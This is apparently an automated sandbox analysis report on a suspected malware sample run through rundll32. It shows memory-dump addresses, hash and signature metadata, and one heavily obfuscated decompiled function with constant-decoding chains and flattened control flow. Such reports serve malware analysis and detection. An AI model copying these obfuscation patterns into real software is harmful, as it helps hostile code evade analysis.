                                                                                                                      0x002d3520
                                                                                                                      0x002d3556
                                                                                                                      0x002d355b
                                                                                                                      0x00000000
                                                                                                                      0x002d355b
                                                                                                                      0x002d3522
                                                                                                                      0x002d3528
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002d3539
                                                                                                                      0x002d353e
                                                                                                                      0x00000000
                                                                                                                      0x002d353e
                                                                                                                      0x002d321e
                                                                                                                      0x002d34c3
                                                                                                                      0x002d34d8
                                                                                                                      0x002d34df
                                                                                                                      0x002d34e4
                                                                                                                      0x002d34e7
                                                                                                                      0x002d34ee
                                                                                                                      0x00000000
                                                                                                                      0x002d34ee
                                                                                                                      0x002d3224
                                                                                                                      0x002d322a
                                                                                                                      0x002d333d
                                                                                                                      0x002d3343
                                                                                                                      0x002d349f
                                                                                                                      0x002d34a4
                                                                                                                      0x00000000
                                                                                                                      0x002d34a4
                                                                                                                      0x002d3349
                                                                                                                      0x002d334f
                                                                                                                      0x002d344b
                                                                                                                      0x002d3450
                                                                                                                      0x002d3452
                                                                                                                      0x002d3475
                                                                                                                      0x002d347e
                                                                                                                      0x002d3486
                                                                                                                      0x00000000
                                                                                                                      0x002d3486
                                                                                                                      0x002d3458
                                                                                                                      0x002d3461
                                                                                                                      0x002d3463
                                                                                                                      0x00000000
                                                                                                                      0x002d3463
                                                                                                                      0x002d3355
                                                                                                                      0x002d335b
                                                                                                                      0x002d3665
                                                                                                                      0x00000000
                                                                                                                      0x002d3665
                                                                                                                      0x002d3361
                                                                                                                      0x002d3367
                                                                                                                      0x002d339c
                                                                                                                      0x002d33cb
                                                                                                                      0x002d33ec
                                                                                                                      0x002d33f8
                                                                                                                      0x002d3412
                                                                                                                      0x002d341c
                                                                                                                      0x002d3430
                                                                                                                      0x002d3437
                                                                                                                      0x002d343c
                                                                                                                      0x002d343c
                                                                                                                      0x00000000
                                                                                                                      0x002d3367
                                                                                                                      0x002d3230
                                                                                                                      0x002d332e
                                                                                                                      0x002d3333
                                                                                                                      0x00000000
                                                                                                                      0x002d3333
                                                                                                                      0x002d3236
                                                                                                                      0x002d323c
                                                                                                                      0x002d3314
                                                                                                                      0x002d3319
                                                                                                                      0x002d3320
                                                                                                                      0x00000000
                                                                                                                      0x002d3320
                                                                                                                      0x002d3242
                                                                                                                      0x002d3248
                                                                                                                      0x002d32f6
                                                                                                                      0x002d32fb
                                                                                                                      0x002d32fd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002d3303
                                                                                                                      0x00000000
                                                                                                                      0x002d3303
                                                                                                                      0x002d324e
                                                                                                                      0x002d3254
                                                                                                                      0x002d32d1
                                                                                                                      0x002d32db
                                                                                                                      0x002d32e3
                                                                                                                      0x002d32e4
                                                                                                                      0x00000000
                                                                                                                      0x002d32e4
                                                                                                                      0x002d3256
                                                                                                                      0x002d325c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002d3262
                                                                                                                      0x002d3266
                                                                                                                      0x002d32ad
                                                                                                                      0x002d32ad
                                                                                                                      0x00000000
                                                                                                                      0x002d32ad
                                                                                                                      0x002d328a
                                                                                                                      0x002d3290
                                                                                                                      0x002d3291
                                                                                                                      0x002d3295
                                                                                                                      0x002d32a8
                                                                                                                      0x00000000
                                                                                                                      0x002d32a8
                                                                                                                      0x002d3297
                                                                                                                      0x00000000
                                                                                                                      0x002d3642
                                                                                                                      0x002d3642
                                                                                                                      0x002d3642
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: kJ$*k$/;$7Mv?$@`ST$Mg$N&>$Nv$RiW$XgI8/$Y$[@M$[TA$``$fyI$l$!CG$I8/$M<$d$t}$z
                                                                                                                      • API String ID: 0-363835068
                                                                                                                      • Opcode ID: fae17f8991b2d273a1845cb4fc4e8dc2894871d7cd2d9121694df2a49b4be7d2
                                                                                                                      • Instruction ID: 2719d9e1367ffc0c25ab64e615f00add6f86f649892f04ad9be2894c7cc19369
                                                                                                                      • Opcode Fuzzy Hash: fae17f8991b2d273a1845cb4fc4e8dc2894871d7cd2d9121694df2a49b4be7d2
                                                                                                                      • Instruction Fuzzy Hash: 22C2117191D3818BD3B8CF25C58ABCBBBE1BB94314F10892EE5D996260D7B08959CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C7BCA Relevance: 24.4, Strings: 19, Instructions: 694COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E002C7BCA(signed int __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _t784;
				signed int _t787;
				signed int _t791;
				void* _t797;
				signed int _t807;
				signed int _t808;
				void* _t827;
				signed int* _t829;
				signed int _t833;
				intOrPtr _t841;
				void* _t884;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				signed int _t902;
				signed int _t903;
				signed int _t904;
				signed int _t905;
				signed int _t906;
				signed int _t907;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t911;
				signed int _t912;
				signed int _t914;
				signed int _t919;
				signed int* _t923;
				void* _t925;

				_push(_a40);
				_push(_a36);
				_push(_a32);
				_t829 = _a24;
				_push(_a28);
				_v16 = __edx;
				_push(_t829);
				_push(_a20);
				_v12 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4 & 0x0000ffff);
				_push(__edx);
				_push(__ecx);
				E002BCF25(_a4 & 0x0000ffff);
				_v4 = _v4 & 0x00000000;
				_v8 = 0x5b6770;
				_t923 =  &(( &_v296)[0xc]);
				_v296 = 0xae8f26;
				_v24 = 0;
				_t827 = 0;
				_t914 = 0x83eeb0d;
				_t899 = 0x66;
				_v296 = _v296 * 0x77;
				_v296 = _v296 + 0xffff6317;
				_v296 = _v296 | 0x51a667a9;
				_v296 = _v296 ^ 0x51a7efe9;
				_v220 = 0x22f2e2;
				_v220 = _v220 + 0xffff44aa;
				_v220 = _v220 / _t899;
				_t900 = 0x6e;
				_v220 = _v220 / _t900;
				_v220 = _v220 ^ 0x000000d4;
				_v180 = 0x3b651;
				_v180 = _v180 << 0xd;
				_v180 = _v180 >> 7;
				_v180 = _v180 ^ 0x00ed9488;
				_v100 = 0xe67bf2;
				_v100 = _v100 + 0x555e;
				_v100 = _v100 ^ 0x00e65150;
				_v120 = 0x8bcc28;
				_v120 = _v120 + 0xffffc7f8;
				_v120 = _v120 ^ 0x008bd420;
				_v216 = 0x57910f;
				_v216 = _v216 ^ 0xab75fa15;
				_v216 = _v216 ^ 0x4a558bb8;
				_v216 = _v216 << 0x10;
				_v216 = _v216 ^ 0xe0e20000;
				_v108 = 0xde84ad;
				_v108 = _v108 + 0xffffece5;
				_v108 = _v108 ^ 0x00da7192;
				_v124 = 0x7a6f99;
				_v124 = _v124 + 0x7c9;
				_v124 = _v124 << 0x10;
				_v124 = _v124 ^ 0x73620000;
				_v212 = 0x24738c;
				_v212 = _v212 + 0xffff84c3;
				_v212 = _v212 ^ 0xe5eb5ff0;
				_v212 = _v212 * 0x5c;
				_v212 = _v212 ^ 0x941448a4;
				_v60 = 0x198952;
				_v60 = _v60 + 0x4ddc;
				_v60 = _v60 ^ 0x0019d52e;
				_v48 = 0xba80a;
				_v48 = _v48 + 0x1f7d;
				_v48 = _v48 ^ 0x000bc687;
				_v40 = 0x36c14f;
				_v40 = _v40 << 0xc;
				_v40 = _v40 ^ 0xec14f000;
				_v72 = 0x4ddbf0;
				_v72 = _v72 + 0xffff1656;
				_v72 = _v72 ^ 0x004cf246;
				_v44 = 0x551f62;
				_v44 = _v44 ^ 0x64841b78;
				_v44 = _v44 ^ 0x64d1045b;
				_v152 = 0xb013f0;
				_t901 = 0x18;
				_v152 = _v152 * 0x52;
				_v152 = _v152 ^ 0xa7d20536;
				_v152 = _v152 ^ 0x9fb467c9;
				_v168 = 0xdb80e;
				_v168 = _v168 << 0xc;
				_v168 = _v168 + 0x66d3;
				_v168 = _v168 ^ 0xdb8146cc;
				_v116 = 0x5fff40;
				_v116 = _v116 + 0xac16;
				_v116 = _v116 ^ 0x0060ab55;
				_v28 = 0x8c1e54;
				_v28 = _v28 ^ 0x40badf76;
				_v28 = _v28 ^ 0x4036c022;
				_v296 = 0x412245;
				_v296 = _v296 / _t901;
				_v296 = _v296 + 0x2cd;
				_v296 = _v296 >> 0xf;
				_v296 = _v296 ^ 0x00000af3;
				_v296 = 0xa8f395;
				_t902 = 0x4e;
				_v296 = _v296 / _t902;
				_v296 = _v296 + 0x6ac4;
				_v296 = _v296 << 6;
				_v296 = _v296 ^ 0x00ac1221;
				_v296 = 0xd124a6;
				_t903 = 7;
				_v296 = _v296 / _t903;
				_v296 = _v296 ^ 0x9d1dae1f;
				_v296 = _v296 | 0xe011ad48;
				_v296 = _v296 ^ 0xfd13ad6e;
				_v296 = 0xfabeb9;
				_v296 = _v296 >> 3;
				_v296 = _v296 + 0xfffff1c8;
				_t904 = 0x7d;
				_v296 = _v296 / _t904;
				_v296 = _v296 ^ 0x000314ef;
				_v296 = 0x1fa60b;
				_v296 = _v296 * 0x75;
				_v296 = _v296 >> 0xd;
				_v296 = _v296 + 0x5a08;
				_v296 = _v296 ^ 0x000a0276;
				_v292 = 0xde324a;
				_v292 = _v292 ^ 0x385f234d;
				_v292 = _v292 ^ 0x83f834b0;
				_v292 = _v292 ^ 0xbb7de3fa;
				_v288 = 0x3fe2ee;
				_t208 =  &_v288; // 0x3fe2ee
				_t905 = 0x7a;
				_v288 =  *_t208 / _t905;
				_v288 = _v288 ^ 0x0006d348;
				_v288 = 0x668cef;
				_v288 = _v288 << 1;
				_v288 = _v288 ^ 0x00ccb692;
				_v296 = 0x30a71d;
				_t906 = 0x6a;
				_v296 = _v296 * 0x35;
				_v296 = _v296 + 0xfc26;
				_v296 = _v296 + 0xffffafb1;
				_v296 = _v296 ^ 0x0a154a10;
				_v292 = 0x29409b;
				_v292 = _v292 << 4;
				_v292 = _v292 + 0x774;
				_v292 = _v292 ^ 0x029bb852;
				_v292 = 0xc87f9a;
				_v292 = _v292 >> 8;
				_v292 = _v292 >> 0xe;
				_v292 = _v292 ^ 0x00086377;
				_v292 = 0x96b752;
				_v292 = _v292 + 0x721a;
				_v292 = _v292 * 0x33;
				_v292 = _v292 ^ 0x1e11edab;
				_v292 = 0x9caff;
				_v292 = _v292 | 0x3ce1fe14;
				_v292 = _v292 ^ 0x920c3820;
				_v292 = _v292 ^ 0xaeed4fa4;
				_v268 = 0x625e2a;
				_v268 = _v268 + 0xa90c;
				_v268 = _v268 << 5;
				_v268 = _v268 + 0xdce3;
				_v268 = _v268 ^ 0x0c65276a;
				_v276 = 0x811ec0;
				_v276 = _v276 << 6;
				_v276 = _v276 * 0x18;
				_v276 = _v276 | 0xc27c5ff7;
				_v276 = _v276 ^ 0xc6f6c0fc;
				_v80 = 0xbf5549;
				_v80 = _v80 + 0xd976;
				_v80 = _v80 ^ 0x00c51c7a;
				_v88 = 0xc74c4b;
				_v88 = _v88 << 0xf;
				_v88 = _v88 ^ 0xa6283482;
				_v164 = 0x7a7277;
				_t287 =  &_v164; // 0x7a7277
				_v164 =  *_t287 * 0x2a;
				_t289 =  &_v164; // 0x7a7277
				_v164 =  *_t289 * 0x14;
				_v164 = _v164 ^ 0x91c2b6e3;
				_v172 = 0x8c5cd0;
				_v172 = _v172 / _t906;
				_v172 = _v172 + 0xffffaf11;
				_v172 = _v172 ^ 0x0000520f;
				_v208 = 0x96f19c;
				_v208 = _v208 >> 0xf;
				_v208 = _v208 ^ 0xf87e01d8;
				_v208 = _v208 ^ 0xf879a426;
				_v64 = 0x5acacd;
				_v64 = _v64 << 5;
				_v64 = _v64 ^ 0x0b5bfe72;
				_v248 = 0xed9818;
				_v248 = _v248 + 0xffff852e;
				_v248 = _v248 + 0x2b61;
				_v248 = _v248 + 0xffff5032;
				_v248 = _v248 ^ 0x00eca9ae;
				_v196 = 0xd8fc83;
				_v196 = _v196 + 0xffffe6c0;
				_v196 = _v196 << 7;
				_v196 = _v196 ^ 0x6c795a10;
				_v104 = 0xa57136;
				_v104 = _v104 << 8;
				_v104 = _v104 ^ 0xa57ba4e8;
				_v112 = 0x619c13;
				_t907 = 0x35;
				_v112 = _v112 * 0x46;
				_v112 = _v112 ^ 0x1ab16c90;
				_v284 = 0x3b2abb;
				_v284 = _v284 * 0x43;
				_v284 = _v284 << 0x10;
				_v284 = _v284 << 3;
				_v284 = _v284 ^ 0x77883a24;
				_v204 = 0xef756c;
				_v204 = _v204 | 0xa0746111;
				_v204 = _v204 ^ 0x0b05d0bc;
				_v204 = _v204 ^ 0xabfd0224;
				_v144 = 0x44b7c0;
				_v144 = _v144 << 6;
				_v144 = _v144 + 0x629;
				_v144 = _v144 ^ 0x1122cbf1;
				_v228 = 0x31841a;
				_v228 = _v228 * 0x38;
				_v228 = _v228 ^ 0x4159fb72;
				_v228 = _v228 + 0x624a;
				_v228 = _v228 ^ 0x4b8ee7c8;
				_v232 = 0xc15230;
				_v232 = _v232 ^ 0x2fe872e1;
				_v232 = _v232 >> 0xe;
				_v232 = _v232 + 0xc85e;
				_v232 = _v232 ^ 0x00073260;
				_v200 = 0xd055c7;
				_v200 = _v200 << 0xe;
				_v200 = _v200 + 0x1578;
				_v200 = _v200 ^ 0x157facd3;
				_v132 = 0xe0a83f;
				_v132 = _v132 * 0x7b;
				_v132 = _v132 >> 0xd;
				_v132 = _v132 ^ 0x000704ed;
				_v240 = 0x8432d;
				_v240 = _v240 | 0xed632ad0;
				_v240 = _v240 ^ 0x6858c4b6;
				_v240 = _v240 + 0xfdcb;
				_v240 = _v240 ^ 0x85392506;
				_v192 = 0x8324f8;
				_v192 = _v192 * 0x5b;
				_v192 = _v192 * 0x35;
				_v192 = _v192 ^ 0xa6bebbcd;
				_v272 = 0x14de64;
				_v272 = _v272 | 0x750df782;
				_v272 = _v272 ^ 0x336a958a;
				_v272 = _v272 + 0xffff8f03;
				_v272 = _v272 ^ 0x467f1cdb;
				_v52 = 0x5532de;
				_v52 = _v52 >> 6;
				_v52 = _v52 ^ 0x00006622;
				_v160 = 0xce031d;
				_v160 = _v160 | 0xfbc8b092;
				_v160 = _v160 * 0x6d;
				_v160 = _v160 ^ 0x3708e9e0;
				_v36 = 0x5242dc;
				_v36 = _v36 >> 7;
				_v36 = _v36 ^ 0x000cba3f;
				_v92 = 0x339fd7;
				_v92 = _v92 + 0xa0d7;
				_v92 = _v92 ^ 0x00306e5b;
				_v128 = 0xd7d7e5;
				_v128 = _v128 * 0x70;
				_v128 = _v128 << 0xe;
				_v128 = _v128 ^ 0x9d0cda42;
				_v264 = 0x31382b;
				_v264 = _v264 / _t907;
				_t908 = 0x45;
				_v264 = _v264 * 0x6c;
				_v264 = _v264 * 0x28;
				_v264 = _v264 ^ 0x0fadceb8;
				_v184 = 0x6ad0e5;
				_v184 = _v184 / _t908;
				_t909 = 0x32;
				_v184 = _v184 * 0x5e;
				_v184 = _v184 ^ 0x009cabd8;
				_v84 = 0x5866f1;
				_v84 = _v84 / _t909;
				_v84 = _v84 ^ 0x000cf4a6;
				_v256 = 0xa194b;
				_v256 = _v256 ^ 0x94dec7ad;
				_t910 = 0x46;
				_v256 = _v256 / _t910;
				_v256 = _v256 >> 0x10;
				_v256 = _v256 ^ 0x000f9e72;
				_v76 = 0x8e9e60;
				_v76 = _v76 + 0xffff51c3;
				_v76 = _v76 ^ 0x0088247f;
				_v224 = 0x83ac61;
				_t911 = 0x3d;
				_v224 = _v224 * 0x1d;
				_v224 = _v224 << 0xc;
				_v224 = _v224 | 0x2dac99f4;
				_v224 = _v224 ^ 0xade893a0;
				_v32 = 0x13495a;
				_v32 = _v32 + 0x5cab;
				_v32 = _v32 ^ 0x001eeb0b;
				_v136 = 0x5c94f5;
				_v136 = _v136 + 0xffff9353;
				_v136 = _v136 * 0x44;
				_v136 = _v136 ^ 0x187702f3;
				_v176 = 0x8546fa;
				_v176 = _v176 ^ 0x1d3e4f45;
				_v176 = _v176 << 4;
				_v176 = _v176 ^ 0xdbb17ead;
				_v56 = 0x621504;
				_v56 = _v56 + 0x6ed1;
				_v56 = _v56 ^ 0x006a4e76;
				_v244 = 0x9c5408;
				_v244 = _v244 | 0xf9568eed;
				_v244 = _v244 + 0x5010;
				_v244 = _v244 / _t911;
				_v244 = _v244 ^ 0x041668c2;
				_v252 = 0xb42276;
				_v252 = _v252 + 0xa961;
				_v252 = _v252 + 0xdc70;
				_v252 = _v252 ^ 0x05685821;
				_v252 = _v252 ^ 0x05d7e4aa;
				_v260 = 0xd51767;
				_v260 = _v260 * 0x31;
				_v260 = _v260 << 0xc;
				_v260 = _v260 << 0xf;
				_v260 = _v260 ^ 0xb80dad1b;
				_v280 = 0xeb0bae;
				_v280 = _v280 | 0x0e7dba98;
				_v280 = _v280 << 6;
				_t912 = 0x26;
				_v280 = _v280 / _t912;
				_v280 = _v280 ^ 0x050e5033;
				_v188 = 0x4bf18;
				_v188 = _v188 * 0x2e;
				_v188 = _v188 | 0xf176dffe;
				_v188 = _v188 ^ 0xf1f57857;
				_v96 = 0x6c4fa9;
				_v96 = _v96 + 0x1fcf;
				_v96 = _v96 ^ 0x00693444;
				_v148 = 0xfd06aa;
				_v148 = _v148 >> 1;
				_v148 = _v148 << 0xc;
				_v148 = _v148 ^ 0xe83e1d17;
				_v156 = 0xd0b75a;
				_v156 = _v156 + 0xffff0c56;
				_v156 = _v156 * 0x3c;
				_v156 = _v156 ^ 0x30b9846f;
				_v288 = 0xd0c6e5;
				_v288 = _v288 >> 0xc;
				_v288 = _v288 ^ 0x0000ba9d;
				_v292 = 0x631535;
				_v292 = _v292 >> 8;
				_v292 = _v292 * 0x1e;
				_v292 = _v292 ^ 0x000d3f85;
				_v296 = 0x662a0d;
				_v296 = _v296 + 0x95ba;
				_v296 = _v296 >> 7;
				_v296 = _v296 ^ 0xe8c154cb;
				_v296 = _v296 ^ 0xe8c95b3b;
				_v140 = 0x555820;
				_v140 = _v140 << 4;
				_v140 = _v140 | 0xc7d2a78c;
				_v140 = _v140 ^ 0xc7df0fda;
				_t913 = _v20;
				_t921 = _v20;
				while(1) {
					L1:
					while(1) {
						_t784 = _v236;
						while(1) {
							L3:
							_t925 = _t914 - 0x83eeb0d;
							if(_t925 <= 0) {
								break;
							}
							__eflags = _t914 - 0x969dc48;
							if(_t914 == 0x969dc48) {
								E002D0411(_t784, _v148, _v156, _v288);
								_t914 = 0x7ec14ff;
								L40:
								_t829 = _a24;
								_t884 = 0x3d0a345;
								L41:
								__eflags = _t914 - 0xa326727;
								if(__eflags == 0) {
									L11:
									return _t827;
								}
								_t784 = _v236;
								continue;
							}
							__eflags = _t914 - 0x9d261fa;
							if(_t914 == 0x9d261fa) {
								_t833 =  *_t829;
								__eflags = _t833;
								if(_t833 == 0) {
									_t787 = 0;
									__eflags = 0;
								} else {
									_t787 = _a24[1];
								}
								E002CBD01(_v56, _t913, _t833, _v244, _v252, _t787, _v260, _a20);
								_t923 =  &(_t923[7]);
								asm("sbb esi, esi");
								_t914 = (_t914 & 0xf886a69e) + 0xe7d57af;
								L13:
								_t829 = _a24;
								goto L1;
							}
							__eflags = _t914 - 0xd1f742e;
							if(_t914 == 0xd1f742e) {
								_push(_t829);
								_t791 = E002C90DB(_v72, _t829, _v268, _t829, _v276, _v80, _v88);
								_t921 = _t791;
								__eflags = _t791;
								_t914 =  !=  ? 0x266034b : 0xa326727;
								E002B68DE(_v164, _v172, _v208, _v64, 0);
								_t923 =  &(_t923[0xa]);
								goto L40;
							}
							__eflags = _t914 - 0xe7d57af;
							if(_t914 == 0xe7d57af) {
								_t703 =  &_v96; // 0x693444
								E002D0411(_t913, _v280, _v188,  *_t703);
								L33:
								_t914 = 0x969dc48;
								goto L13;
							}
							__eflags = _t914 - 0xef78d61;
							if(__eflags != 0) {
								goto L41;
							}
							_t914 = 0xd1f742e;
						}
						if(_t925 == 0) {
							_t914 = 0xef78d61;
							goto L3;
						}
						if(_t914 == 0xb94cb2) {
							__eflags = E002D0867(_t913, _a28);
							_t914 = 0xe7d57af;
							_t797 = 1;
							_t827 =  !=  ? _t797 : _t827;
							goto L13;
						}
						if(_t914 == 0x266034b) {
							_t695 =  &_v112; // 0x306e5b
							_t784 = E002C00A0(_t921, _t829, _t829, _v248, _v196, _t829, _v104, _a36,  *_t695, _v284, _v204, _v116, _v144, _a4);
							_t829 = _a24;
							_t923 =  &(_t923[0xd]);
							__eflags = _t784;
							_v236 = _t784;
							_t884 = 0x3d0a345;
							_t914 =  !=  ? 0x3d0a345 : 0x7ec14ff;
							goto L3;
						}
						if(_t914 == _t884) {
							__eflags =  *_t829;
							if(__eflags == 0) {
								_t841 = _v24;
							} else {
								_push(_v132);
								_push(_v200);
								_push(0x2b12fc);
								_t841 = E002BAB66(_v228, _v232, __eflags);
								_t923 =  &(_t923[3]);
								_v24 = _t841;
							}
							_t657 =  &_v100; // 0xe65150
							_t807 = _v40 | _v48 | _v60 | _v212 | _v124 | _v108 | _v216 | _v120 |  *_t657;
							_t919 = _v12 & 1;
							__eflags = _t919;
							if(_t919 != 0) {
								__eflags = _t807;
							}
							_push(_t841);
							_t808 = E002D0349(_t841, _v240, _v16, _t841, _t841, _v192, _v272, _t807, _v236, _t841, _v52, _v160);
							_t913 = _t808;
							E002BAE03(_v36, _v92, _v128, _v24);
							_t923 =  &(_t923[0xd]);
							__eflags = _t808;
							if(__eflags == 0) {
								goto L33;
							} else {
								_v68 = 1;
								E002BB6D1(_v44, _v264, _v184, 4, _v84,  &_v68, _t913);
								_t923 =  &(_t923[5]);
								__eflags = _t919;
								if(__eflags != 0) {
									E002B75A5(_t913, _v256, _v152, _v76, _v224,  &_v68,  &_v20);
									_t682 =  &_v68;
									 *_t682 = _v68 | _v28;
									__eflags =  *_t682;
									E002BB6D1(_v168, _v32, _v136, _v20, _v176,  &_v68, _t913);
									_t923 =  &(_t923[0xa]);
								}
								_t914 = 0x9d261fa;
								goto L13;
							}
						}
						if(_t914 == 0x703fe4d) {
							__eflags = E002B84B8(_t913, _v220, __eflags) - _v180;
							_t914 =  ==  ? 0xb94cb2 : 0xe7d57af;
							goto L13;
						}
						if(_t914 != 0x7ec14ff) {
							goto L41;
						}
						E002D0411(_t921, _v292, _v296, _v140);
						goto L11;
					}
				}
			}










































































































                                                                                                                      0x002c7bd4
                                                                                                                      0x002c7be4
                                                                                                                      0x002c7bf0
                                                                                                                      0x002c7bf7
                                                                                                                      0x002c7bfe
                                                                                                                      0x002c7c05
                                                                                                                      0x002c7c0c
                                                                                                                      0x002c7c0d
                                                                                                                      0x002c7c14
                                                                                                                      0x002c7c1b
                                                                                                                      0x002c7c22
                                                                                                                      0x002c7c29
                                                                                                                      0x002c7c30
                                                                                                                      0x002c7c31
                                                                                                                      0x002c7c32
                                                                                                                      0x002c7c33
                                                                                                                      0x002c7c38
                                                                                                                      0x002c7c42
                                                                                                                      0x002c7c4d
                                                                                                                      0x002c7c50
                                                                                                                      0x002c7c5a
                                                                                                                      0x002c7c61
                                                                                                                      0x002c7c68
                                                                                                                      0x002c7c6f
                                                                                                                      0x002c7c72
                                                                                                                      0x002c7c76
                                                                                                                      0x002c7c7e
                                                                                                                      0x002c7c86
                                                                                                                      0x002c7c8e
                                                                                                                      0x002c7c96
                                                                                                                      0x002c7ca6
                                                                                                                      0x002c7cae
                                                                                                                      0x002c7cb1
                                                                                                                      0x002c7cb5
                                                                                                                      0x002c7cbd
                                                                                                                      0x002c7cc8
                                                                                                                      0x002c7cd0
                                                                                                                      0x002c7cd8
                                                                                                                      0x002c7ce3
                                                                                                                      0x002c7cee
                                                                                                                      0x002c7cf9
                                                                                                                      0x002c7d04
                                                                                                                      0x002c7d0f
                                                                                                                      0x002c7d1a
                                                                                                                      0x002c7d25
                                                                                                                      0x002c7d2d
                                                                                                                      0x002c7d35
                                                                                                                      0x002c7d3d
                                                                                                                      0x002c7d42
                                                                                                                      0x002c7d4a
                                                                                                                      0x002c7d55
                                                                                                                      0x002c7d60
                                                                                                                      0x002c7d6b
                                                                                                                      0x002c7d76
                                                                                                                      0x002c7d81
                                                                                                                      0x002c7d89
                                                                                                                      0x002c7d94
                                                                                                                      0x002c7d9c
                                                                                                                      0x002c7da4
                                                                                                                      0x002c7db1
                                                                                                                      0x002c7db5
                                                                                                                      0x002c7dbd
                                                                                                                      0x002c7dc8
                                                                                                                      0x002c7dd5
                                                                                                                      0x002c7de0
                                                                                                                      0x002c7deb
                                                                                                                      0x002c7df6
                                                                                                                      0x002c7e01
                                                                                                                      0x002c7e0c
                                                                                                                      0x002c7e14
                                                                                                                      0x002c7e1f
                                                                                                                      0x002c7e2a
                                                                                                                      0x002c7e35
                                                                                                                      0x002c7e40
                                                                                                                      0x002c7e4b
                                                                                                                      0x002c7e56
                                                                                                                      0x002c7e61
                                                                                                                      0x002c7e76
                                                                                                                      0x002c7e79
                                                                                                                      0x002c7e80
                                                                                                                      0x002c7e8b
                                                                                                                      0x002c7e96
                                                                                                                      0x002c7ea1
                                                                                                                      0x002c7ea9
                                                                                                                      0x002c7eb4
                                                                                                                      0x002c7ebf
                                                                                                                      0x002c7eca
                                                                                                                      0x002c7ed5
                                                                                                                      0x002c7ee0
                                                                                                                      0x002c7eeb
                                                                                                                      0x002c7ef6
                                                                                                                      0x002c7f01
                                                                                                                      0x002c7f11
                                                                                                                      0x002c7f15
                                                                                                                      0x002c7f1d
                                                                                                                      0x002c7f22
                                                                                                                      0x002c7f2a
                                                                                                                      0x002c7f36
                                                                                                                      0x002c7f3b
                                                                                                                      0x002c7f41
                                                                                                                      0x002c7f49
                                                                                                                      0x002c7f4e
                                                                                                                      0x002c7f56
                                                                                                                      0x002c7f62
                                                                                                                      0x002c7f67
                                                                                                                      0x002c7f6d
                                                                                                                      0x002c7f75
                                                                                                                      0x002c7f7d
                                                                                                                      0x002c7f85
                                                                                                                      0x002c7f8d
                                                                                                                      0x002c7f92
                                                                                                                      0x002c7f9e
                                                                                                                      0x002c7fa1
                                                                                                                      0x002c7fa5
                                                                                                                      0x002c7fad
                                                                                                                      0x002c7fba
                                                                                                                      0x002c7fbe
                                                                                                                      0x002c7fc3
                                                                                                                      0x002c7fcb
                                                                                                                      0x002c7fd3
                                                                                                                      0x002c7fdb
                                                                                                                      0x002c7fe3
                                                                                                                      0x002c7feb
                                                                                                                      0x002c7ff3
                                                                                                                      0x002c7ffb
                                                                                                                      0x002c8003
                                                                                                                      0x002c8008
                                                                                                                      0x002c800e
                                                                                                                      0x002c8016
                                                                                                                      0x002c801e
                                                                                                                      0x002c8022
                                                                                                                      0x002c802a
                                                                                                                      0x002c8037
                                                                                                                      0x002c8038
                                                                                                                      0x002c803c
                                                                                                                      0x002c8044
                                                                                                                      0x002c804c
                                                                                                                      0x002c8054
                                                                                                                      0x002c805c
                                                                                                                      0x002c8061
                                                                                                                      0x002c8069
                                                                                                                      0x002c8071
                                                                                                                      0x002c8079
                                                                                                                      0x002c807e
                                                                                                                      0x002c8083
                                                                                                                      0x002c808b
                                                                                                                      0x002c8093
                                                                                                                      0x002c80a0
                                                                                                                      0x002c80a4
                                                                                                                      0x002c80ac
                                                                                                                      0x002c80b4
                                                                                                                      0x002c80bc
                                                                                                                      0x002c80c4
                                                                                                                      0x002c80cc
                                                                                                                      0x002c80d4
                                                                                                                      0x002c80dc
                                                                                                                      0x002c80e1
                                                                                                                      0x002c80e9
                                                                                                                      0x002c80f1
                                                                                                                      0x002c80f9
                                                                                                                      0x002c8103
                                                                                                                      0x002c8107
                                                                                                                      0x002c810f
                                                                                                                      0x002c8117
